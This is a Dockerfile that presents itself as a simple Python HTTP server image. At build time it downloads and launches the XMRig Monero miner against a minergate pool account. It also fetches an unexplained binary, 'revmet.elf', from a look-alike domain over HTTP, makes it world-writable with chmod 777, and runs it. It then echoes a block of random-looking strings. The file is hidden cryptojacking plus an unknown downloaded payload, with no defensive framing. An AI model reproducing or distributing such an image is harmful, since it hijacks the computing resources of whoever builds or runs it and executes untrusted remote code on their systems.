FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo ru0M4gekj9X1CqomS1XAez89ouUzZGeB oKgxGUI7h9f1wksxVc7qTKgUhKSDtOR0 AQbwbCeOxG5CkTWlBY3bZA5bkVYXwU3f e0X4tkJSYkO9MbgJitZLOmu4Z8iuZmOP smhkeQfv3T9O8DOiDdWarDmLtuKmWw92 xGEEJ4xUmEaMHdxmfVCwaKYPyP60zfup jkJ5curfPccsRPs38A8G3kZvCsoa8HR7 CcxOgsm8m3C1SVT31tyPy8z8Nve16eg0 LSAYNFI2L2wLViZYCoF9xbQhlIUoyzjf yk7i1HE08SG5nPk1jGrRHrzJzmyf7i9q XXDD0zpOlI9aR69xIJ3T2XV1aNo0AqGB sWdjGxeUYMDQWwJt48a2u4cv7ecr93yG O9Z2mjnBcY7Jdpac9zXQYHGHvbcqqhcT kPbZhhH5JGotDXyuuYZBZZ6xPIBIAjmx DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]